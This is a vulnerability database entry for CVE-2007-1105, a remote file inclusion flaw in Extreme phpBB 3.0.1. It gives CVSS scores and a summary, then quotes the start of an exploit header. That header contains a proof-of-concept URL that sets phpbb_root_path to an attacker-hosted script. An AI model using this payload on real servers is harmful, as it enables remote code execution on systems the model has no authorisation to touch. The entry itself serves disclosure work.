5
CVSSv2

CVE-2007-1105

Published: 26/02/2007 Updated: 11/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

PHP remote file inclusion vulnerability in functions.php in Extreme phpBB (aka phpBB Extreme) 3.0.1 allows remote malicious users to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

extreme phpbb extreme phpbb 3.0.1

Exploits

# (C) xoron # # [Name: phpBB Extreme 301 (phpbb_root_path) Remote File Include Exploit ] # # [Author: xoron] # [Exploit coded by xoron] # # [Download: sourceforgenet/project/showfilesphp?group_id=95900 ] # # [Tesekkurler: pang0, DJR] # # [POC: /includes/functionsphp?phpbb_root_path=evilscripts?] # # [Vuln Codes: include_once( $p ...